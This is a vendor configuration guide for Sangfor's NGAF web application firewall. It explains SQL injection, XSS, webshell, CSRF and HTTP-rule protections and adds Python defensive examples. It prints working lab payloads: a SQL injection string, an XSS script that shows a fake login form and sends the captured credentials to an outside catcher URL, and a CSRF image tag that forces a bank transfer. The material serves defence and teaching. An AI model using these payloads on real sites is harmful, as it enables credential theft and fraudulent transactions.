SANGFOR - NGAF - V8.0.5 - WAF Configuration Guide
Version 8.0.5
Change Log
Date | Change Description
Contents
2.1.3 Trojan
2.1.5 WEBSHELL
2.1.6 CSRF
2.1.12 Parameters
2.1.14 Password
2.1.15 Privilege
2.1.16 HTTP
Chapter 1 Background
An attacker can abuse this SQL query to obtain more information. For example, entering sangfor' or '1'='1 in the input box changes the query to:
SELECT * FROM user_data WHERE last_name = 'sangfor' or '1'='1'
The condition '1'='1' is always true, so the query returns every row instead of the single matching record.
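The same lookup written with string concatenation (the behaviour the guide describes) beside a version that binds the value as a parameter. This is an added example, not code from the guide; the user_data table and its rows are constructed here so it runs offline.

```python
import sqlite3

# Constructed sample table (not from the guide) mirroring the user_data query above.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (id INTEGER, last_name TEXT, cc_number TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?, ?, ?)", [
        (1, "sangfor", "4111-0000-0000-0001"),
        (2, "smith", "4111-0000-0000-0002"),
        (3, "jones", "4111-0000-0000-0003"),
    ])
    return db

def lookup_vulnerable(db, last_name):
    # String concatenation: the input becomes part of the SQL text, so
    # sangfor' or '1'='1 rewrites the WHERE clause exactly as shown above.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, last_name):
    # Bound parameter: the driver passes the value separately from the SQL
    # text, so the quote and OR are just characters inside a name.
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return db.execute(sql, (last_name,)).fetchall()

PAYLOAD = "sangfor' or '1'='1"   # the input from the text above

if __name__ == "__main__":
    db = make_db()
    print(len(lookup_vulnerable(db, PAYLOAD)))       # 3: every row leaks
    print(len(lookup_parameterized(db, PAYLOAD)))    # 0: no such last name
    print(len(lookup_parameterized(db, "sangfor")))  # 1: the intended record
```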
The attacker enters HTML and script in the input box, such as:
"</form><script>function hack(){ XSSImage=new Image;
XSSImage.src="http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}
</script>
<form name="phish"><br><br><HR><H3>This feature requires account login:</H2><br><br>
Enter Username:<br><input type="text" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>"
This code runs in the result page and shows a fake login form to other users. When another user enters a username and password, the credentials are sent to the attacker's URL:
http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user=
Sangfor WAF denies the HTML and script and records the event as follows:
2.1.3 Trojan
2.1.5 WEBSHELL
In some scenarios a website needs to let users upload files. An attacker can upload a webshell, then use another tool to access that webshell and take control of the whole website.
In this test the attacker uploads a JSP webshell, then visits it to control the website.
2.1.6 CSRF
CSRF, cross-site request forgery, is a type of malicious exploit of a website in which unauthorized commands are transmitted from a user that the website trusts.
For example:
User A is visiting his online bank at http://www.bank.com.
Attacker B sends A an email that contains an image:
<img src="http://www.bank.com/transfer.php?accound=B&amount=1000"/>
When A opens the mail and clicks the picture, A's browser sends a request to
http://www.bank.com/transfer.php?accound=B&amount=1000
and transfers 1000 to B, using A's existing bank session.
Sangfor WAF can deny this attack by checking the HTTP Referer header field.
In the following configuration, http://www.bank.com/transfer.php may only be visited from http://www.bank.com.
So even if user A clicks the picture and requests the transfer page, the traffic is denied, because the request did not come from http://www.bank.com.
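The Referer check described above, written out as an added example (not Sangfor's implementation). The protected path and allowed origin are constructed to match the bank scenario; the check compares the parsed hostname exactly and fails closed when the header is missing, as it often is for a request launched from a mail client.

```python
from urllib.parse import urlsplit

# Constructed policy (not from the guide): the protected page and the only
# host allowed to refer to it, as in the configuration described above.
PROTECTED_PATH = "/transfer.php"
ALLOWED_REFERER_HOST = "www.bank.com"

def request_allowed(url, referer):
    """Return True if the request for `url` may proceed given its Referer header.

    Pages other than the protected one are not subject to the check.
    """
    if urlsplit(url).path != PROTECTED_PATH:
        return True
    if not referer:
        # No Referer (mail client, privacy setting, stripped by a proxy):
        # fail closed, since the legitimate flow from the bank's own pages
        # always sends one.
        return False
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https"):
        return False
    # Compare the parsed hostname exactly. A substring test would accept
    # www.bank.com.evil.example, evil.example/?www.bank.com or
    # www.bank.com@evil.example (userinfo), all of which parse to other hosts.
    return parts.hostname == ALLOWED_REFERER_HOST

if __name__ == "__main__":
    transfer = "http://www.bank.com/transfer.php?accound=B&amount=1000"
    print(request_allowed(transfer, "http://www.bank.com/account.php"))  # True
    print(request_allowed(transfer, "http://mail.example/inbox"))        # False
    print(request_allowed(transfer, None))                               # False
```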
The website administrator can use this function to set which directories or pages a user may visit.
For example, http://www.sangfor.com/manage/xxxx is for the administrator to manage the website, and http://www.sangfor.com/main/xxx is for ordinary users to visit.
We can configure it as follows, allowing users to visit only http://www.sangfor.com/main/xxx.
2.1.12 Parameters
This is an intelligent function: the NGAF WAF learns the data users normally send.
For example, if 95% of users post only letters and numbers to the server, but someone then posts other special characters, the WAF treats it as abnormal behaviour; the administrator can set the action to deny or to log the event.
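A small learning-then-checking profile of the kind the paragraph describes, added here as an example (not Sangfor's algorithm). It learns, per parameter name, the widest character class that covers 95% of the training values, then flags values that need a wider class; the training traffic is constructed.

```python
import re
from collections import Counter, defaultdict

# Character classes from narrowest to widest; a value's level is the first
# class that matches it, and anything else is level 3 ("special characters").
CLASSES = [re.compile(r"^[0-9]*$"), re.compile(r"^[A-Za-z0-9]*$"),
           re.compile(r"^[A-Za-z0-9 ]*$")]

def level(value):
    for i, pattern in enumerate(CLASSES):
        if pattern.match(value):
            return i
    return len(CLASSES)

class ParameterProfile:
    """Learn, per parameter name, the widest level seen in min_share of samples."""

    def __init__(self, min_share=0.95):      # the 95% figure from the text
        self.min_share = min_share
        self.counts = defaultdict(Counter)
        self.learned = {}

    def learn(self, name, value):
        self.counts[name][level(value)] += 1

    def finish(self):
        # Walk levels from narrowest to widest until min_share is covered.
        for name, levels in self.counts.items():
            total, covered = sum(levels.values()), 0
            for lvl in sorted(levels):
                covered += levels[lvl]
                self.learned[name] = lvl
                if covered / total >= self.min_share:
                    break

    def check(self, name, value):
        if name not in self.learned:
            return "unknown-parameter"     # never seen while learning: log it
        return "ok" if level(value) <= self.learned[name] else "anomaly"

# Constructed learning traffic (not real data): 96 plain last names, a few
# legitimate names with punctuation or spaces, and purely numeric amounts.
SAMPLES = ([("last_name", n) for n in ["smith", "jones", "sangfor", "lee"] * 24]
           + [("last_name", n) for n in ["o'brien", "d'arcy", "st-john", "mc neil"]]
           + [("amount", str(i)) for i in range(100)])

def build_profile():
    profile = ParameterProfile()
    for name, value in SAMPLES:
        profile.learn(name, value)
    profile.finish()
    return profile
```

With this training set last_name settles on the alphanumeric level and amount on digits, so a last_name value containing quotes or an equals sign is reported as an anomaly.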
HTTP
http://192.200.19.86:8080/webgoat/uploads/1.jsp is a URL that does not exist, but an attacker can still try to obtain information from the server's response.
Before enabling Sangfor WAF, the response reveals that the website does not have the file 1.jsp and that the website runs on Apache Tomcat/7.0.27.
After enabling Sangfor WAF, nothing can be learned from the server response.
2.1.14 Password
Sangfor WAF can detect whether FTP/HTTP passwords are weak or strong, and can inspect cleartext web-access requests.
Even if a user logs in to FTP/HTTP with a weak password, the WAF does not deny the traffic; this function can, however, be used together with the defense against brute-force attacks.
2.1.15 Privilege
In this function the administrator can define which file types may be uploaded to the server, because an attacker may use the upload function to upload a webshell or trojan.
File upload is restricted by file type. If an attacker uploads a webshell or trojan under a spoofed file type, the traffic is denied by the webshell or trojan protection.
Lesson location: Malicious Execution-->Malicious File Execution
The administrator can configure URL access rights, defining which URLs are allowed or denied.
If a URL is allowed in this function, requests to it are allowed even when they carry an attack.
2.1.16 HTTP
The administrator can allow only certain HTTP request methods, preventing attacks that use other methods.
For the test, we disallow the POST method and then send a POST request; Sangfor WAF denies the traffic and records it as follows.
Sangfor WAF can also define which files may be downloaded, for example denying downloads of .bak/.sql/.mdb/... files.
For this test, we set it to deny files with the .jpg extension.
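The URL access rights from 2.1.15 and the method and download-extension rules from this section, combined into one request evaluator as an added example (this is not NGAF's rule engine, and the rule order and field names are this example's own). The point a practitioner needs is the normalization step: a prefix rule on /main/ is only meaningful if /main/../manage/x and its percent-encoded forms are resolved before the comparison.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed policy modelled on the rules described in the text.
POLICY = {
    "allowed_methods": {"GET", "HEAD"},         # POST denied, as in the test above
    "allowed_prefixes": ["/main/"],             # users may visit only /main/...
    "denied_prefixes": ["/manage/"],            # administrator-only area
    "denied_extensions": {".bak", ".sql", ".mdb"},
}

def normalize_path(raw_path):
    """Decode and collapse the path so /main/%2e%2e/manage/x is seen as /manage/x."""
    path = unquote(unquote(raw_path))                 # also undoes double encoding
    return posixpath.normpath("/" + path.lstrip("/")) # resolves . and .. segments

def evaluate(method, url, policy=POLICY):
    """Return (action, reason) for one request; the first matching rule wins.

    Ordering is this example's choice: method, then download extension, then
    URL access rights, so an allowed prefix cannot re-enable a denied download.
    """
    if method.upper() not in policy["allowed_methods"]:
        return ("deny", "method not allowed")
    path = normalize_path(urlsplit(url).path)
    # Extension check on the last segment only, case-insensitive so that
    # backup.Bak or dump.SQL are not missed.
    ext = posixpath.splitext(path)[1].lower()
    if ext in policy["denied_extensions"]:
        return ("deny", "download of %s file denied" % ext)
    if any(path.startswith(p) for p in policy["denied_prefixes"]):
        return ("deny", "URL access right")
    if any(path.startswith(p) for p in policy["allowed_prefixes"]):
        return ("allow", "URL allowed")
    return ("deny", "URL not in allowed list")

if __name__ == "__main__":
    for req in [("POST", "http://www.sangfor.com/main/index.jsp"),
                ("GET", "http://www.sangfor.com/main/../manage/users.jsp"),
                ("GET", "http://www.sangfor.com/main/db.SQL?x=1"),
                ("GET", "http://www.sangfor.com/main/index.jsp")]:
        print(req[0], req[1], "->", evaluate(*req))
```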
Chapter 3 Troubleshooting
NGAF Unable To Deny/Locate Attack
1) Make sure the traffic actually passes through NGAF. Especially when NGAF is deployed in mirror mode, a mirror port must be configured and the traffic directed to NGAF.
2) Check the configuration:
Destination IP must be the server's real private IP, not the public NAT IP.
Port must be the server's service port.
3) Make sure the database is updated to the latest version.
4) Make sure the option to send a TCP reset message to reject the request is checked; otherwise NGAF cannot deny the attack.
5) Check the log and note whether the action is allow or deny. If this is a real attack, you can change the database action based on the rule ID.
6) Check the global exclusion IP list and ensure the troubleshooting option is disabled; otherwise traffic from the listed IPs will bypass inspection.